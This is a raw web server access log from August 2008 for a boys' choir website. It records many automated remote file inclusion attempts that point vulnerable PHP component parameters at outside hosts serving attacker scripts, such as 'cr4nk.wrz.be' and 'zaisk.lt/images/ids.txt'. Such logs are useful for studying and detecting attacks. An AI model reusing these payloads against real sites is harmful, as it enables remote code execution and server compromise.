58.68.29.102 - - [20/Aug/2008:05:00:46 -0700] "GET /xxxx/ HTTP/1.0" 200 506 "http://www.google.co.in/search?num=50&hl=en&q=index+of+xxxx&btnG=Search&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.americanboyschoir.com"
209.51.141.74 - - [20/Aug/2008:05:01:23 -0700] "GET /logs/access_080810.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.americanboyschoir.com"
209.51.141.74 - - [20/Aug/2008:05:01:24 -0700] "GET /logs/access_080810.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.americanboyschoir.com"
209.51.141.74 - - [20/Aug/2008:05:01:25 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.americanboyschoir.com"
209.51.141.74 - - [20/Aug/2008:05:01:25 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.americanboyschoir.com"
209.51.141.74 - - [20/Aug/2008:05:01:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.americanboyschoir.com"
209.51.141.74 - - [20/Aug/2008:05:01:26 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.americanboyschoir.com"
201.130.79.132 - - [20/Aug/2008:05:01:40 -0700] "GET /www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=http://melissa.lu/components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
209.51.141.74 - - [20/Aug/2008:05:02:09 -0700] "GET /logs/access_080814.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.americanboyschoir.com"
209.51.141.74 - - [20/Aug/2008:05:02:11 -0700] "GET /logs/access_080814.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.americanboyschoir.com"
67.19.111.146 - - [20/Aug/2008:05:04:57 -0700] "GET /logs/access_080805.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
67.19.111.146 - - [20/Aug/2008:05:04:57 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
67.19.111.146 - - [20/Aug/2008:05:04:57 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
69.72.161.50 - - [20/Aug/2008:05:05:01 -0700] "GET /logs/access_080807.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.americanboyschoir.com"
69.72.161.50 - - [20/Aug/2008:05:05:03 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.americanboyschoir.com"
69.72.161.50 - - [20/Aug/2008:05:05:03 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.americanboyschoir.com"
67.19.111.146 - - [20/Aug/2008:05:05:18 -0700] "GET /logs/access_080807.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
69.72.161.50 - - [20/Aug/2008:05:05:47 -0700] "GET /logs/access_080805.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.americanboyschoir.com"
69.72.161.50 - - [20/Aug/2008:05:05:47 -0700] "GET /logs/access_080807.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.americanboyschoir.com"
69.72.161.50 - - [20/Aug/2008:05:05:49 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.americanboyschoir.com"
69.72.161.50 - - [20/Aug/2008:05:05:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.americanboyschoir.com"
211.233.19.218 - - [20/Aug/2008:05:05:56 -0700] "GET /logs/access_080814.log/rfihttp://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:06:13 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:06:13 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
201.130.79.132 - - [20/Aug/2008:05:06:14 -0700] "GET /logs/access_080810.log/www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=http://melissa.lu/components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
201.130.79.132 - - [20/Aug/2008:05:06:14 -0700] "GET /logs/www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=http://melissa.lu/components/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
69.72.161.50 - - [20/Aug/2008:05:06:29 -0700] "GET /logs/access_080805.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.americanboyschoir.com"
67.41.4.26 - - [20/Aug/2008:05:06:55 -0700] "GET /logs//netcat_files//index.php?DOCUMENT_ROOT=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
67.41.4.26 - - [20/Aug/2008:05:06:55 -0700] "GET //netcat_files//index.php?DOCUMENT_ROOT=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:07:12 -0700] "GET /logs/access_080730.log//netcat_files//index.php?DOCUMENT_ROOT=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:07:12 -0700] "GET //netcat_files//index.php?DOCUMENT_ROOT=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:07:12 -0700] "GET /logs//netcat_files//index.php?DOCUMENT_ROOT=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
67.19.111.146 - - [20/Aug/2008:05:07:16 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
67.19.111.146 - - [20/Aug/2008:05:07:16 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:07:31 -0700] "GET /logs/access_080807.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:07:32 -0700] "GET /logs/access_080807.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:07:32 -0700] "GET /logs/access_080807.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:07:32 -0700] "GET //com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:07:32 -0700] "GET //com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:07:32 -0700] "GET //com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:07:32 -0700] "GET /logs//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:07:32 -0700] "GET /logs//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:07:32 -0700] "GET /logs//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
85.12.15.28 - - [20/Aug/2008:05:07:41 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://fratore.altervista.org/ufficio/tommy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.americanboyschoir.com"
85.12.15.28 - - [20/Aug/2008:05:07:41 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://fratore.altervista.org/ufficio/tommy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.americanboyschoir.com"
85.12.15.28 - - [20/Aug/2008:05:07:49 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://fratore.altervista.org/ufficio/tommy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "americanboyschoir.com"
85.12.15.28 - - [20/Aug/2008:05:07:49 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://fratore.altervista.org/ufficio/tommy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:08:06 -0700] "GET /logs/access_080807.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:08:06 -0700] "GET //com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:08:06 -0700] "GET /logs//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:08:56 -0700] "GET /logs/access_080807.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:08:56 -0700] "GET //com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:08:56 -0700] "GET /logs//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:08:58 -0700] "GET /logs/access_080807.log//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:08:59 -0700] "GET //com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:08:59 -0700] "GET /logs//com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:09:19 -0700] "GET /logs/access_080812.log/errors.php?error=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:09:19 -0700] "GET /errors.php?error=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:09:20 -0700] "GET /logs/errors.php?error=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:10:00 -0700] "GET /logs/access_080729.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:10:00 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:10:01 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
91.121.143.183 - - [20/Aug/2008:05:10:25 -0700] "GET /logs/access_080730.log//?custompluginfile[]=http://www.wsmarketing.cl/biosonda/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
91.121.143.183 - - [20/Aug/2008:05:10:25 -0700] "GET /logs//?custompluginfile[]=http://www.wsmarketing.cl/biosonda/oye.txt?? HTTP/1.1" 200 1658 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
91.121.143.183 - - [20/Aug/2008:05:10:25 -0700] "GET //?custompluginfile[]=http://www.wsmarketing.cl/biosonda/oye.txt?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
91.121.143.183 - - [20/Aug/2008:05:10:35 -0700] "GET /logs/access.log//?custompluginfile[]=http://www.wsmarketing.cl/biosonda/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:10:48 -0700] "GET /logs/access_080729.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:10:48 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:10:48 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:12:22 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:12:22 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:12:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
211.233.19.218 - - [20/Aug/2008:05:12:32 -0700] "GET /rfihttp://www.ezdesigns.net/geeklog/plugins/spamx/Mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
66.135.41.76 - - [20/Aug/2008:05:12:50 -0700] "GET //?custompluginfile[]=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
66.135.41.76 - - [20/Aug/2008:05:12:50 -0700] "GET /logs//?custompluginfile[]=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 200 1658 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
66.135.41.76 - - [20/Aug/2008:05:12:56 -0700] "GET /logs/access_080810.log//?custompluginfile[]=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
66.135.41.76 - - [20/Aug/2008:05:13:15 -0700] "GET /logs/access_080811.log//?custompluginfile[]=http://www.sunflowerseminars.com/cgi-bin/php/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:13:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:13:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
91.121.143.183 - - [20/Aug/2008:05:13:32 -0700] "GET /logs/access_080809.log//?custompluginfile[]=http://www.wsmarketing.cl/biosonda/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
72.52.143.147 - - [20/Aug/2008:05:13:41 -0700] "GET /logs/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.americanboyschoir.com"
72.52.143.147 - - [20/Aug/2008:05:13:41 -0700] "GET /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:13:52 -0700] "GET /logs/access.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:13:53 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:13:54 -0700] "GET /logs/access_080812.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
217.110.54.240 - - [20/Aug/2008:05:14:01 -0700] "GET /logs/access_080808.log/errors.php?error=http://rampagearcade.com/arcade/img/jaemid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:14:08 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:14:08 -0700] "GET /errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:14:08 -0700] "GET /logs/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:14:22 -0700] "GET /logs/access_080805.log/errors.php?error=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:14:58 -0700] "GET /logs/access.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:14:58 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:15:02 -0700] "GET /logs/access_080812.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:15:11 -0700] "GET /logs/access.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:12 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:12 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:15:12 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:12 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:12 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:12 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:12 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:14 -0700] "GET /logs/access.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:14 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:14 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:15:15 -0700] "GET /logs/access_080812.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:16 -0700] "GET /logs/access_080812.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:17 -0700] "GET /logs/access.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:17 -0700] "GET //?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1724 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:17 -0700] "GET /logs//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 200 1658 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:15:19 -0700] "GET /logs/access_080812.log//?custompluginfile%5B%5D=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
61.100.30.4 - - [20/Aug/2008:05:15:30 -0700] "GET /logs/access_080812.log//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
